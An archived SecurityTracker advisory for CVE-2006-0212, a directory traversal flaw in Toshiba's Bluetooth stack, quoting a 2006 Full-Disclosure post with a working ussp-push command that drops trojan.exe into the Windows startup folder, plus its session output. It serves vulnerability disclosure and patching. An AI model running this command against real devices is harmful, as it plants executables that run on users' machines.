SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Toshiba Bluetooth Stack Vendors:   Toshiba
Toshiba Bluetooth Stack Input Validation Holes Permit Directory Traversal Attacks
SecurityTracker Alert ID:  1015486
SecurityTracker URL:  http://securitytracker.com/id/1015486
CVE Reference:   CVE-2006-0212   (Links to External Site)
Updated:  Oct 17 2006
Original Entry Date:  Jan 13 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.00.23(T) and prior versions
Description:   A vulnerability was reported in the Toshiba Bluetooth stack. A remote user can view or upload files on the target system.

A remote user can supply a specially crafted OBEX Push service command containing '../' directory traversal characters to view files on the target system or attempt to upload files to arbitrary locations on the target system. If the target user (recipient) accepts the uploaded file, the file will be written to the arbitrary location with the privileges of the target user.

Kevin Finisterre reported this vulnerability.

The original advisory is available at:

http://www.digitalmunition.com/DMA[2006-0112a].txt

Impact:   A remote user can view or upload files to arbitrary locations on the target system.
Solution:   The vendor has issued a fixed version (Security Patch 2), available at:

http://aps.toshiba-tro.de/bluetooth/redirect.php?page=pages/download.php

Vendor URL:  www.toshiba.co.jp/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] DMA[2006-0112a] - 'Toshiba Bluetooth Stack

This is a multi-part message in MIME format.
--------------090603050604020708080600
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit



--------------090603050604020708080600
Content-Type: text/plain;
 name="DMA[2006-0112a].txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="DMA[2006-0112a].txt"

DMA[2006-0112a] - 'Toshiba Bluetooth Stack Directory Transversal'
Author: Kevin Finisterre
Vendor: http://www.toshiba-tro.de/
Product: 'Toshiba Bluetooth Stack <=v4.00.23(T)'
References: 
http://www.digitalmunition.com/DMA[2006-0112a].txt

Description: 
Toshiba was one of the first companies to provide a working Bluetooth PC stack supporting 
the v1.2 specification. In March 2004 Fujitsu made available their LifeBook S7010 mobile 
computer qualified compliant with Toshiba's stack becoming the first available BT v1.2 device. 
Toshiba's licensing of its stack has provided an advantage to partners looking to support the 
new specification.

Until recently when a few co-workers purchased Dell XPS M170 laptops with internal TrueMobile 
350 Bluetooth modules, I had not actually seen the Toshiba stack deployed. I assume the reason 
I have not seen it anywhere is due to the fact that Widcomm still seems to dominate the market. 

After leaving the office I searched for more information on the Toshiba stack and wound up 
downloading a copy from the Bluetooth SIG website. Build20050512_v3031C-30Days.zip was and may 
still be distributed at http://www.bluetooth.org. Since notifying Toshiba of the issue I have 
been unable to locate this file on the SIG website.

Both the version 3.x binary provided by the SIG as well as a version 4.x binary that I downloaded 
from http://aps.toshiba-tro.de/bluetooth/pages/download.php were tested and found to be vulnerable 
to simple ../ style attacks in their OBEX Push services. Further testing also confirmed the Dell
driver was also exploitable. http://ftp.us.dell.com/network/R112482.EXE is Toshiba Stack v4.00.11.

Using ussp-push an attacker can place a trojaned file anywhere on the filesystem. This attack will
require the user to accept the connection request. Upon being prompted to accept the request the 
user is asked where the downloaded file should be placed. Regardless of the user specified path an 
attacker can place the anywhere that the user has permission to write. During the connection 
request no filename is presented so the person being attacked has no real indication that something 
malicious is occurring. 

animosity:/home/kfinisterre/ussp-push-0.5# ./ussp-push 
00:11:B1:07:BE:A7@4 trojan.exe ..\\..\\..\\..\\..\\windows\\startup\\pwned.exe
pushing file trojan.exe
name=trojan.exe, size=18009
Registered transport

set user data

created new objext
Local device 00:0A:3A:54:71:95
Remote device 00:11:B1:07:BE:A7 (4)

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ..\..\..\..\..\windows\startup\pwned.exe, path: trojan.exe, size: 18009
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!

Work Around: 
Do not accept connection requests from unknown sources. Wait for proper vendor response and 
updates. Multiple attempts to inform the vendor about this issue were made however I was unable 
to maintain a dialog with anyone that would respond to email. Further questions about this issue 
should be directed to the Toshiba support staff or your hardware manufacturer. 



 




--------------090603050604020708080600
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--------------090603050604020708080600--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC